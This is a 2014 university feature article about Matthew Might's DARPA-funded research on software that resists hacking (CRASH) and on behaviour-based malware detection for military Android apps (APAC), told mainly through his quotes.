The Unhackable Dream

Pete CodellaArticles

Warning: This post may cause slight paranoia

In today’s world, nearly everything is accessible on the internet. While this creates an encyclopedic gateway to almost unlimited knowledge, it’s also a place where privacy is an anomaly, identities are stolen, top secret information is hacked and cyber wars are waged.

Dr. Matthew Might, an Associate Professor in the University of Utah’s School of Computing, is working on several projects for the military’s advanced research agency (DARPA) to create unhackable software.

Might is working on two specific projects specifically geared to creating unhackable software. The first project is Clean-Slate Design of Resilient, Adaptive, Secure Hosts (CRASH) and the second is called Automated Program Analysis for Cybersecurity (APAC). A University of Utah team is one of several nationally working on CRASH.

 

CRASH: Clean-Slate Design of Resilient, Adaptive, Secure Hosts 

The basis of the CRASH program is to create new computer systems that are resistant to cyber-attack. For Might, the best way to prevent hacking is to approach software coding the way a mathematician would approach a theorem.

“We have the same level of trust in the software we write that the mathematician would in say the Pythagorean Theorem,” Might said. “That is to say, the Pythagorean Theorem will be true forever and the software that we write will be secure forever because it’s that level of guarantee. Again, the downside to something like this is that it’s really expensive to produce.”

One way to prevent the insertion of malicious code is to make sure the software code written is void of any flaws or weaknesses that would make it susceptible to attack. Might approaches the problem from a different angle from typical anti-malware software that people have on their computer.

Might’s goal is to keep things affordable and scale between two approaches: one approach is to have the software do exactly what it says it’s going to do by mathematically proving the absence of all bugs, thereby fully securing the software (at great cost); a complementary approach ensures that any bugs in the software cannot become exploitable security vulnerabilities.

“That’s the thing—aiming for cost effectiveness and security—that sets the Utah approach apart from other teams,” Might said. “While other teams want absolute security and correctness, we’re allowing flexibility, we’ll guarantee that the software is completely secure but programs can still crash. Whereas other teams are trying to say we’ll never let the program crash at all and the program will always do what it’s supposed to do.”

Might and his team have developed new programming languages, operating systems and even test applications. Not only is the redevelopment useful for companies and businesses, but the military as well.

“So we have all the way up to a secure webserver built on top of our system,” Might said. Might then gestures to an off-the-shelf router as he says, “We’ve been able to install our software stack on devices like this off the shelf Linksys router, so we can install our entire suite on here [gestures to the router] and we can give this to say military and this is absolutely secure.”

 

APAC: Automated Program Analysis for Cybersecurity 

The second project Might is working on is called Automated Program Analysis for Cybersecurity (APAC).

APAC specifically targets malware in mobile phones. Currently, the military wants every soldier to have an Android device and to have access to an app store for military grade applications for soldiers. They would even like to allow third parties to contribute to the app store. However, this immediately opens up the possibility for adversaries to put malicious code into the app store.

The military has contracted with researchers like Might to create malware detectors that are more sophisticated than the malware detectors on the market today.

The typical malware detector looks for a specific sequence of words within the application’s code. The issue with this is that it’s not full proof because someone can take the existing piece of malware and modify it ever so slightly and then the signature changes and the malware goes right through all the signatures that they’ve built up.  There are millions of modified or new malicious codes and there are only so many good guys battling to find them.

“So, if we’re going to give soldiers these devices, if their lives are going to depend on these things, we have to give them an entirely new way of detecting malware that is impervious to the faults of the previous regime,” Might said.

The approach the military wants to use to prevent malware infiltration is semantic based malware detection. This means they don’t want the signatures to be based on looking for a specific sequence of words in the source code, what they want is to take an application and look at what it’s going to do. They want to be able to scan the behaviors of the software, not just its source code. This way they can see exactly what the software is going to do.

Once scanned, Might’s team’s tool reports back all the points in the potential execution of the program where it looks like some kind of malicious behavior is happening. After this it’s up to a human analyst to determine whether that behavior is malicious. While they can’t fully automate malware detection software, they’re trying to make it as fully automated as possible.

 

–              Kaitlin Felsted: July 29, 2014